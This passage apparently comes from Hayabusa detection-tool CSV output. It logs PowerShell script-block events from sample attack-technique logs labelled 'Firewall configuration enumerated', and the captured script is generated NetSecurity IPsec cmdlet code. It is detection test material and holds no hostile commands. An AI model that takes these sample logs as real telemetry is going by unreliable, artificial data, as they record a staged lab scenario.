[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru 
= $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System 
Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] 
$",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { 